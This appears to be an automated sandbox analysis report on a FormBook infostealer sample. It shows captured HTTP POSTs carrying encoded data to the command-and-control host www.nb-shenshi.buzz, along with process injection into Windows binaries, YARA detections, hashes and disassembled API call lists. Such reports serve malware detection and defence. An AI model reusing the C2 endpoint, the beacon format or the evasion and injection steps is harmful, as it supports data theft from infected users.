Jan 10, 2025 21:48:10.576853037 CET	1236	IN	Data Raw: 32 38 39 2c 31 38 2e 34 31 35 35 20 2d 38 2e 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 Data Ascii: 289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	50030	161.97.142.144	80	3716	C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:48:15.747786045 CET	745	OUT	POST /mz7t/ HTTP/1.1 Host: www.nb-shenshi.buzz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Content-Length: 203 Origin: http://www.nb-shenshi.buzz Referer: http://www.nb-shenshi.buzz/mz7t/ User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0 Data Raw: 62 6c 4f 34 68 30 3d 50 47 79 71 4a 63 37 44 68 7a 36 70 5a 6a 39 47 4b 4f 6b 44 73 61 6c 70 66 50 75 49 64 48 50 59 63 68 4c 4b 73 49 6b 70 32 6a 51 6b 66 38 6d 63 6b 38 65 73 61 59 64 66 77 67 76 42 7a 75 68 5a 39 6b 6e 50 71 7a 42 2f 46 46 39 45 4d 75 75 55 61 72 49 64 48 74 35 6e 4b 6f 6a 34 35 42 58 4f 66 6f 4e 50 4d 42 32 75 66 31 34 76 78 33 52 78 50 6a 6f 61 38 58 59 49 49 58 41 72 6d 6f 75 68 35 71 31 41 74 36 64 76 41 34 73 41 6c 33 51 76 51 4d 51 67 79 50 74 43 34 50 65 66 43 55 39 2f 51 42 50 58 47 55 4e 49 4a 32 6a 31 58 34 7a 36 53 78 56 37 76 48 75 44 55 65 76 71 55 71 52 6e 30 41 3d 3d Data Ascii: blO4h0=PGyqJc7Dhz6pZj9GKOkDsalpfPuIdHPYchLKsIkp2jQkf8mck8esaYdfwgvBzuhZ9knPqzB/FF9EMuuUarIdHt5nKoj45BXOfoNPMB2uf14vx3RxPjoa8XYIIXArmouh5q1At6dvA4sAl3QvQMQgyPtC4PefCU9/QBPXGUNIJ2j1X4z6SxV7vHuDUevqUqRn0A==
Jan 10, 2025 21:48:16.346995115 CET	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Jan 2025 20:48:16 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"66cce1df-b96" Content-Encoding: gzip Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED] Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z\|Q&8UjXB]O;g}\|5@Ro&i<b)~KmA5n)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V\|NRkPqcq?mDEN&BFtKGQ/xI %iO\|CqCJAtV"\|"@(3'!A>0HpL(pHP8G,$Qc
Jan 10, 2025 21:48:16.347023964 CET	370	IN	Data Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0 Data Ascii: (aL`!I>:8%>!+F3\|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	50031	161.97.142.144	80	3716	C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:48:18.847743034 CET	765	OUT	POST /mz7t/ HTTP/1.1 Host: www.nb-shenshi.buzz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Content-Length: 223 Origin: http://www.nb-shenshi.buzz Referer: http://www.nb-shenshi.buzz/mz7t/ User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0 Data Raw: 62 6c 4f 34 68 30 3d 50 47 79 71 4a 63 37 44 68 7a 36 70 5a 43 4e 47 49 70 77 44 6c 61 6c 75 54 76 75 49 54 6e 50 63 63 67 33 4b 73 4a 67 44 32 77 30 6b 65 64 57 63 6c 35 69 73 5a 59 64 66 6f 51 76 49 74 65 68 57 39 6b 72 39 71 32 35 2f 46 46 70 45 4d 72 53 55 61 59 67 61 47 39 35 68 42 49 6a 36 33 68 58 4f 66 6f 4e 50 4d 41 53 45 66 31 77 76 32 48 68 78 50 42 41 5a 69 48 59 50 50 58 41 72 77 6f 75 6c 35 71 31 79 74 34 70 4a 41 36 6b 41 6c 31 34 76 52 64 51 6a 37 50 73 4a 33 76 66 33 45 42 6b 6c 5a 45 75 43 62 6b 68 4b 50 48 43 58 62 65 2b 67 44 41 30 73 39 48 4b 77 4a 5a 6d 65 5a 70 73 75 76 46 4e 70 70 76 58 58 5a 4e 6d 49 74 69 36 7a 45 33 59 68 70 38 55 3d Data Ascii: blO4h0=PGyqJc7Dhz6pZCNGIpwDlaluTvuITnPccg3KsJgD2w0kedWcl5isZYdfoQvItehW9kr9q25/FFpEMrSUaYgaG95hBIj63hXOfoNPMASEf1wv2HhxPBAZiHYPPXArwoul5q1yt4pJA6kAl14vRdQj7PsJ3vf3EBklZEuCbkhKPHCXbe+gDA0s9HKwJZmeZpsuvFNppvXXZNmIti6zE3Yhp8U=
Jan 10, 2025 21:48:19.461214066 CET	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Jan 2025 20:48:19 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"66cce1df-b96" Content-Encoding: gzip Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED] Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z\|Q&8UjXB]O;g}\|5@Ro&i<b)~KmA5n)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V\|NRkPqcq?mDEN&BFtKGQ/xI %iO\|CqCJAtV"\|"@(3'!A>0HpL(pHP8G,$Qc
Jan 10, 2025 21:48:19.461232901 CET	370	IN	Data Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0 Data Ascii: (aL`!I>:8%>!+F3\|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L

Session ID	Source IP	Source Port	Destination IP	Destination Port
27	192.168.2.4	50032	161.97.142.144	80

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:48:22.051482916 CET	10847	OUT	POST /mz7t/ HTTP/1.1 Host: www.nb-shenshi.buzz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Content-Length: 10303 Origin: http://www.nb-shenshi.buzz Referer: http://www.nb-shenshi.buzz/mz7t/ User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0 Data Raw: 62 6c 4f 34 68 30 3d 50 47 79 71 4a 63 37 44 68 7a 36 70 5a 43 4e 47 49 70 77 44 6c 61 6c 75 54 76 75 49 54 6e 50 63 63 67 33 4b 73 4a 67 44 32 77 38 6b 66 76 65 63 6c 61 4b 73 59 59 64 66 32 67 76 46 74 65 68 4c 39 6e 62 35 71 32 39 77 46 47 52 45 4e 4f 65 55 57 39 63 61 4d 39 35 68 4f 6f 6a 35 35 42 58 66 66 73 70 4c 4d 42 69 45 66 31 77 76 32 46 35 78 47 7a 6f 5a 67 48 59 49 49 58 41 2f 6d 6f 75 64 35 71 74 69 74 37 46 5a 42 4c 45 41 6d 56 49 76 64 50 6f 6a 30 50 73 4c 30 76 66 76 45 42 68 37 5a 41 47 30 62 6b 6c 6b 50 48 32 58 49 70 58 61 58 77 34 31 73 41 7a 69 58 59 6d 62 56 72 6f 7a 74 6e 39 78 68 64 4c 62 61 4f 4f 6b 32 43 61 36 51 47 59 55 32 35 6f 64 48 46 79 57 68 6c 52 61 45 2f 38 2b 45 51 38 6e 34 39 4c 72 6a 66 4e 7a 73 69 58 41 33 56 59 67 47 69 55 69 64 73 47 4a 6f 68 4d 4e 58 4f 73 54 78 57 64 6d 71 46 38 70 45 2f 6a 51 78 69 74 59 66 44 44 54 2f 6b 58 74 71 48 72 71 54 7a 46 4a 57 79 45 58 78 6b 5a 48 66 6f 52 66 39 31 69 55 70 33 6d 49 69 4e 6b 6c 74 50 2f 59 48 4b 50 51 49 70 6e [TRUNCATED] Data Ascii: blO4h0=PGyqJc7Dhz6pZCNGIpwDlaluTvuITnPccg3KsJgD2w8kfveclaKsYYdf2gvFtehL9nb5q29wFGRENOeUW9caM95hOoj55BXffspLMBiEf1wv2F5xGzoZgHYIIXA/moud5qtit7FZBLEAmVIvdPoj0PsL0vfvEBh7ZAG0bklkPH2XIpXaXw41sAziXYmbVroztn9xhdLbaOOk2Ca6QGYU25odHFyWhlRaE/8+EQ8n49LrjfNzsiXA3VYgGiUidsGJohMNXOsTxWdmqF8pE/jQxitYfDDT/kXtqHrqTzFJWyEXxkZHfoRf91iUp3mIiNkltP/YHKPQIpnOqr76WrF0d9KAkmpJfCvdyZVTVPnNcJBEIv0bEbHniR01C/Z3336AAZKtBeEKurrCjPqYH2smZf3PAGVxV4YLqjmB+edhzaD4w+fVuwn/2kNZEKgzICVwD33UyN53U4z6XGlTsJwGuG8X0rmu7U6vMHj+nsDXLGa+eKqkHUAoOdIqr7J08frAwPDyDRYuYQo7lccp9FdjyzKFnmlY7GOCIBupzeZdEN29YEqZZS2KCtDpjRd7dP1+Ptmt/z7AJrR/wmYbgZVCVT4sF8TE3yF4LZFZG9rsNcyKpiCn6hfCZ9AN2l9umLRBwk++s5Y5bWXQBbhxjv0jMjSr2+KIgEM3L/PGu0CCVHhvPfwj5oDUgbwLn2ta89Z9Xt/6iRwP6pf0zOZZ0JMIP3Iaae7wPsRxpUoDf6AzxFEzQp+3tdOR7uZV6eoeqzaUv48t2w5o2zOo0JYOXsKkSmKl+NzfD6jAQvcRqiA7ROuIgYJINXLNgzcOdbMlCySvl9mWPTsdv0HxjarbYkdGRW1+J8YUYrFxuY+aCWYF8qzPsMSU1+MeeSB4lBklXc/wHOEbOoBm9dlIzEhTBxAZ4hi9cLup3E0wBl5hnx/DDu6TlE7kxnv6vMJ80h2t59QeeUN9BHeyfijGJ0y9Td2qTCwJoowAAv6HTDNO1E8IpV4bH [TRUNCATED]
Jan 10, 2025 21:48:22.686919928 CET	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Jan 2025 20:48:22 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"66cce1df-b96" Content-Encoding: gzip Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED] Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z\|Q&8UjXB]O;g}\|5@Ro&i<b)~KmA5n)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V\|NRkPqcq?mDEN&BFtKGQ/xI %iO\|CqCJAtV"\|"@(3'!A>0HpL(pHP8G,$Qc
Jan 10, 2025 21:48:22.686939001 CET	370	IN	Data Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0 Data Ascii: (aL`!I>:8%>!+F3\|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L

Target ID:	0
Start time:	15:45:11
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\gKvjKMCUfq.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\gKvjKMCUfq.exe"
Imagebase:	0x770000
File size:	1'211'904 bytes
MD5 hash:	71732F96D8FCCDF3373AB6E417DF3CF9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	15:45:16
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\gKvjKMCUfq.exe"
Imagebase:	0xf0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2211380258.00000000071D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2208574163.0000000003DE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2207975108.0000000002600000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	15:45:57
Start date:	10/01/2025
Path:	C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe"
Imagebase:	0x820000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3553008112.0000000001220000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3553656900.0000000003760000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	15:45:59
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\tzutil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\tzutil.exe"
Imagebase:	0x7ff72bec0000
File size:	48'640 bytes
MD5 hash:	31DE852CCF7CED517CC79596C76126B4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3552001637.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3553295403.0000000003390000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3553342363.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	15:46:24
Start date:	10/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.8%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	6.2%
Total number of Nodes:	2000
Total number of Limit Nodes:	69

Executed Functions

Function 00773B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00773B68
IsDebuggerPresent.KERNEL32 ref: 00773B7A
GetFullPathNameW.KERNEL32(00007FFF,?,?,008352F8,008352E0,?,?), ref: 00773BEB

Part of subcall function 00777BCC: _memmove.LIBCMT ref: 00777C06

Part of subcall function 0078092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00773C14,008352F8,?,?,?), ref: 0078096E

SetCurrentDirectoryW.KERNEL32(?), ref: 00773C6F
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00827770,00000010), ref: 007AD281
SetCurrentDirectoryW.KERNEL32(?,008352F8,?,?,?), ref: 007AD2B9
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00824260,008352F8,?,?,?), ref: 007AD33F
ShellExecuteW.SHELL32(00000000,?,?), ref: 007AD346

Part of subcall function 00773A46: GetSysColorBrush.USER32(0000000F), ref: 00773A50
Part of subcall function 00773A46: LoadCursorW.USER32(00000000,00007F00), ref: 00773A5F
Part of subcall function 00773A46: LoadIconW.USER32(00000063), ref: 00773A76
Part of subcall function 00773A46: LoadIconW.USER32(000000A4), ref: 00773A88
Part of subcall function 00773A46: LoadIconW.USER32(000000A2), ref: 00773A9A
Part of subcall function 00773A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00773AC0
Part of subcall function 00773A46: RegisterClassExW.USER32(?), ref: 00773B16

Part of subcall function 007739D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00773A03
Part of subcall function 007739D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00773A24
Part of subcall function 007739D5: ShowWindow.USER32(00000000,?,?), ref: 00773A38
Part of subcall function 007739D5: ShowWindow.USER32(00000000,?,?), ref: 00773A41

Part of subcall function 0077434A: _memset.LIBCMT ref: 00774370
Part of subcall function 0077434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00774415

Strings

runas, xrefs: 007AD33A
This is a third-party compiled AutoIt script., xrefs: 007AD279

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 529118366-3287110873
Opcode ID: fa4288dbeac0c6b747cdb9ebc1c126521741fff44bc2b976c8f6d603ecedeb19
Instruction ID: 27309ba25e15030ed9cbaa8882e0b8b1eaefe22c13b66818f2eb0282d2f67b7f
Opcode Fuzzy Hash: fa4288dbeac0c6b747cdb9ebc1c126521741fff44bc2b976c8f6d603ecedeb19
Instruction Fuzzy Hash: A851E370908108EACF11ABB4DC09AFE7B78BF85780F00C465F429A22A2DA6C5A45DB61

Function 007749A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 007749CD

Part of subcall function 00777BCC: _memmove.LIBCMT ref: 00777C06

GetCurrentProcess.KERNEL32(?,007FFAEC,00000000,00000000,?), ref: 00774A9A
IsWow64Process.KERNEL32(00000000), ref: 00774AA1
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00774AE7
FreeLibrary.KERNEL32(00000000), ref: 00774AF2
GetSystemInfo.KERNEL32(00000000), ref: 00774B23
GetSystemInfo.KERNEL32(00000000), ref: 00774B2F

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: 58d7d11f81c955b1b0419a2626f3281325e4b5a022c8e4c14e48c83eeb4bdea2
Instruction ID: f8eb252ea6450b5ed143639c42b053220503304f309410c8aa929b595bda22aa
Opcode Fuzzy Hash: 58d7d11f81c955b1b0419a2626f3281325e4b5a022c8e4c14e48c83eeb4bdea2
Instruction Fuzzy Hash: 3191C6319897C0DECB31CB7888545AABFF5AF6A340B44CE5DD0CB93A41D728A908C75E

Function 00774E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

